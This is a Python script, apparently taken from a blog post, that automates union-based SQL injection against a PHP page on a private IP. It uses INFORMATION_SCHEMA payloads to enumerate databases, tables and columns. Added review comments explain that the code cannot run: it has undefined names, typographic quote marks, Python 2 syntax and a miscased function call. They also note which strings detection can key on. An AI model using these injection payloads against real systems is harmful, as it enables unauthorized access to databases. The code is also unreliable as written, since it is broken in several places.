//sqliIsSoEasy.py
import requests
import urllib
import re
# Module-level SQL fragments assembled by plain string concatenation -- the
# construction that parameterized queries on the server side exist to make
# harmless. The fixed hex markers 0x7177657E / 0x7E717765 are the bytes of
# "qwe~" / "~qwe", which the regex in visitUrlByUnion later extracts; those
# literals, together with the information_schema references, are exactly the
# kind of constant strings a WAF rule or access-log search can key on.
payload={}  # assigned here but never read anywhere in this file
payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"
# NOTE(review): `database_name` and `table_name` are never bound at module
# level (they appear only as locals inside getTBName / getCOLName), so the two
# assignments below raise NameError as soon as the module is imported. The
# ‘ characters are typographic quotes from the copy/paste, and the same damage
# affects the Python string delimiters elsewhere in this file.
payload_tb = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"‘"+database_name+"‘"
payload_col = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"‘"+table_name+"‘"
#有回显的联合查询:通过一个正则表达式判断是否有注入成功后的内容,若有则返回所需部分内容
def visitUrlByUnion(url,payload):
    """Send one GET with an encoded query string and return the text found
    between the qwe~ ... ~qwe markers in the response body.

    url: base URL; the encoded query is appended after ‘?‘.
    payload: accepted but never referenced. The body encodes a name
        `values` that is not defined anywhere in this file, so the call
        raises NameError before any request is made.
    Returns the list of regex captures when at least one matched; otherwise
    execution falls off the end and the result is None, which the callers in
    this file then try to iterate.
    """
    # Python 2 API: urllib.urlencode lives in urllib.parse on Python 3, and the
    # ‘ ‘ delimiters on the next line are not valid Python string quotes.
    data = urllib.urlencode(values)
    geturl = url+‘?‘+data
    # Everything travels in the URL, so the full string lands verbatim in the
    # server's access log -- the usual place such probing is detected.
    response = requests.get(geturl)
    result=response.content  # bytes on Python 3; the str pattern below would then raise TypeError
    find_list=re.findall(r"qwe~(.+?)~qwe", result)
    if len(find_list)>0:
        return find_list
#获取数据库列表
def getDBName(url):
    """Fetch results for payload_db and print each extracted name.

    `get` is not defined in this file and is not imported, so this raises
    NameError; the Python 2 print statements below also do not parse on 3.
    """
    name_list=get(url,payload_db)
    print ‘The databases:‘
    # Trailing comma is the Python 2 "suppress newline" form.
    for i in name_list:
        print i+" ",
    print "\n"
#选择数据库,获取表
def getTBName(url):
    """Prompt for a schema name, fetch results for payload_tb and print them.

    The value read here is a local; payload_tb was already built (or already
    failed with NameError) at import time, so this assignment never reaches
    the query string. `get` is undefined in this file, and raw_input plus the
    print statements are Python 2 only.
    """
    database_name=raw_input(‘please input your database:‘)
    name_list=get(url,payload_tb)
    print ‘The tables:‘
    # Trailing comma is the Python 2 "suppress newline" form.
    for i in name_list:
        print i+" ",
    print "\n"
#选择表,获取字段
def getCOLName(url):
    """Prompt for a table name, fetch results for payload_col and print them.

    As in getTBName, the local assigned here has no effect on the
    module-level payload_col string, which was evaluated at import time.
    `get` is undefined in this file; raw_input and the print statements are
    Python 2 only. Unlike the two functions above, no final newline is
    printed.
    """
    table_name=raw_input(‘please input your table:‘)
    name_list=get(url,payload_col)
    print ‘The columns:‘
    # Trailing comma is the Python 2 "suppress newline" form.
    for i in name_list:
        print i+" ",
#选择所有字段,获取数据
if __name__ == ‘__main__‘:
    # Hard-coded private-range URL carried over from the original post.
    url=‘http://192.168.106.130/config/sql.php‘
    getDBName(url)
    getTBName(url)
    # NOTE(review): the function above is named getCOLName (different case),
    # so this line raises NameError even if the earlier calls had succeeded.
    getColName(url)
原文:https://www.cnblogs.com/p0pl4r/p/10323518.html